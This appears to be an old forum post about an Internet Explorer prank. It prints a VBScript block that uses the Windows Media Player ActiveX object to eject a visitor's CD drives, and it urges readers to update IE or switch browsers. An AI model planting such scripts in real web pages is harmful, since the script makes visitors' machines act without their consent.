There was an exploit in IE, where on a webpage there is a script which would take advantage of the exploit and allow the script to make the certain machine to undertake tasks which were not intended, ie. the cupholder.
On this website:
http://www.geocities.com/nomoremsie/cupholder.html
if your ie isnt updated it would open the cdrom drive hence the free cupholder
Then there is the VB script:
<SCRIPT LANGUAGE="VBScript">
<!--
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
-->
</SCRIPT>
This is a lesson for those IE users, update IE or migrate to something else like Mozilla/Firefox, Opera, etc